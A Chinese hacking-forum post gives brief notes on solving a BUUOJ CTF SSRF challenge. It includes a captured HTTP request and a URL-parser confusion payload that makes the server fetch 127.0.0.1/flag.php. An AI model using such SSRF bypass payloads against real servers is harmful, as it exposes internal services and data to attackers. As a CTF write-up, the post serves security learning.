跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

网络安全之web安全 SSRF

CNHAT
CNHAT
WEB和服务器安全漏洞

精选回复

发布于

[第二章 web进阶]SSRF


介绍:记录一下笔记,方便以后迅速回忆使用。

 

一、信息收集

  • 1.首页
    在这里插入图片描述
  • bp手抓的包
  • 通过post请求提交URL 
POST / HTTP/1.1
Host: c0b4a054-af89-447a-a1f7-456148d6e9fe.node3.buuoj.cn
Content-Length: 11
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://c0b4a054-af89-447a-a1f7-456148d6e9fe.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://c0b4a054-af89-447a-a1f7-456148d6e9fe.node3.buuoj.cn/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

url=dsfadfs
  • payload 
http://c83f8e90-2d41-465e-b179-6fdf4b9bfa8f.node3.buuoj.cn/challenge.php/?url=http://a:@127.0.0.1:[email protected]/flag.php

在这里插入图片描述

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。